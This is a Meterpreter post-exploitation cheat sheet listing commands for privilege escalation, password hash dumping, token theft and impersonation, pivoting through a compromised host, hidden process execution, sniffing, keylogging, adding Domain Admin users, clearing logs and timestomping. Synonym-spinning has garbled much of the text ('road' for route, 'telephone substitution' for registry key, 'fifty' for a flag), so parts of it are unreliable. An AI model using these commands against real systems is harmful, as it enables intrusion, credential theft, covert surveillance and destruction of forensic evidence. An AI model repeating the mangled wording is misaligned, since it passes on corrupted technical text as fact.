Basic Commands
sysinfo getpid getuid ps ps -S notepad.exe kill <pid> ipconfig road migrate <PID> getsystem getprivs purpose priv hashdump vanquish background
File System Commands
ls pwd cd del <file> truthful cat <file> edit <file> upload <src_file> <dst_file> download <src_file> <dst_file> getwd getlwd
Port Forwarding
We convey compromised victim1 amongst meterpreter session_id. Background meterpreter together with add together the road below. It volition redirect all traffic for the to a higher house victim2_subnet through victim1.
route add together <victim2 subnet> <netmask> <session_id> road -h road listing road delete <victim2_subnet> <netmask> <session+id>Forwards traffic from port fifty on Kali(localhost) to port p of Target2 through the compromised Target1
portfwd portfwd add together -l 1111 -p 2222 -r Target2 portfwd take -l 1111 -p 2222 -r Target2
Execute Processes
Execute cmd.exe together with interact amongst it
execute -f cmd.exe -iExecute cmd.exe amongst all available tokens
execute -f cmd.exe -i -tExecute cmd.exe amongst all available tokens together with larn far a hidden procedure
execute -f cmd.exe -i -H -t
- H Create the procedure hidden from view
- a Arguments to top to the command
- i Interact amongst the procedure afterwards creating it
- 1000 Execute from memory
- t Execute procedure amongst currently impersonated thread token
run <scriptname>
Registry
Interact, create, delete, query, set, together with much to a greater extent than inward the target’s registry
reg <Command> [OPTIONS]commands:
enumkey ->Enumerate the supplied registry telephone substitution createkey / deletekey -> Creates/deletes the supplied registry telephone substitution setval / queryval -> Set/query values from the supplied registry telephone substitution Options: -d -> Data to shop inward the registry value -k -> The registry telephone substitution -v -> The registry value name
Tokens
use incognito list_tokens -u list_tokens -g impersonate_token DOMAIN_NAME\\USERNAME steal_token PID drop_token rev2self
Sniffing
use sniffer sniffer_interfaces sniffer_dump interfaceID pcapname sniffer_start interfaceID packet-buffer sniffer_stats interfaceID sniffer_stop interfaceID
Post Exploitation
add_user username password -h ip add_group_user “Domain Admins” username -h ip clearav timestomp screenshot keyscan_start keyscan_dump keyscan_stop uictl enable keyboard/mouse setdesktop pose out reboot run post/windows/manager/enable_rdp+ Run msfmap
Download it from http://code.google.com/p/msfmap charge msfmap msfmap